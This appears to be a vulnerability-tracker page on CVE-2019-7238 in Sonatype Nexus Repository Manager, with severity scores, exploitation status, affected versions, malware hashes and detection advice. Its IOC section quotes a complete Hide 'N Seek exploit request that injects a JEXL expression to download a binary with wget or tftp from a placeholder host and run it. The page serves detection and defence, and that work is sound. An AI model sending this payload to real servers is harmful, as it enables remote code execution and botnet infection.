cbcvebase.
CVE-2019-7238
published 2019-03-21

CVE-2019-7238: Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control.

PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-06-10
Exploited in the wild
EPSS
76.53%
99.5th percentile
Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control.

Affected

1 ranges
VendorProductVersion rangeFixed in
sonatypenexus_repository_manager>= 3.0.0 < 3.15.03.15.0

Detection & IOCsextracted from sources · hover to see the quote

url/service/extdirect
hash49495c9aa08d7859fec1f99f487560b59d8a8914811746181e4e7edbee85341f
hashd068e8f781879774f0bcc1f2a116211d41194b67024fe45966c8272a8038a7a1
hash1583fd1c6607b77f51411c4ad7c9225324fd1b069645062a348cd885de0ac382
hash7e20c6cea88ade6a6c4a08ce48fe4ac2451069b7662a8dda4362a304b4854ec7
hash0b05202f4da9bbe1af1811707a76544453282c4f3c0ac9b353759c86742f4369
hash73df4e952c581afc427fa18fa2d0bcfa409c1814cd872a3ccf05d44f934ce780
hashc082c39e595c7f23c04ce0d6597657d6e649585d5da49b5bd896e664b712e60d
hash500dd4c1a5c24495c3bb8173ce5c7b15ba3344aef855090b9b9585b2bfeea974
command{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName(',27h,'java.lang.Runtime',27h,').getRuntime().exec(['flock','-w','0','/tmp/l%N','sh','-c','(wget http://%J/%T -O %N||/bin/busybox tftp -g -l %N -r %T %I)&&chmod 777 %N&&./%N a%J a%J',27h,'])"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}
bytes
XOR key 0x87, cumulative byte-wise XOR string encryption
  • Exploit traffic targets POST /service/extdirect with Content-Type: application/json; payload sets action=coreui_Component, method=previewAssets, filter property=expression with type=jexl — detect this combination in HTTP request bodies to identify CVE-2019-7238 exploitation attempts.
  • The exploit payload uses JEXL expression injection via the 'expression' filter property with type 'jexl' in the previewAssets ExtDirect call; look for 'java.lang.Runtime' or 'getRuntime().exec' strings inside JSON POST bodies to /service/extdirect.
  • Hide 'N Seek botnet samples use a cumulative byte-wise XOR with key 0x87 for string obfuscation; use this decryption scheme when reverse-engineering captured samples.
  • Trend Micro Deep Security DPI rule 1009553 and TippingPoint MainlineDV filter 34706 can be used to detect/block CVE-2019-7238 exploitation traffic.
  • ·The exploit payload template uses format specifiers (%J, %T, %N, %I) as placeholders for attacker-controlled values (host, filename, IP, etc.); actual observed payloads will have these substituted with real infrastructure values.
  • ·Hard-coded P2P peer IPs and ports for this Hide 'N Seek variant are hosted externally on Palo Alto's GitHub page and are not reproduced inline in the article; consult that resource for the full peer list.
  • ·Exploitation requires at least one file to exist in any repository on the target NXRM 3 instance; a completely empty repository manager may not be exploitable.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa7.5HIGH
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.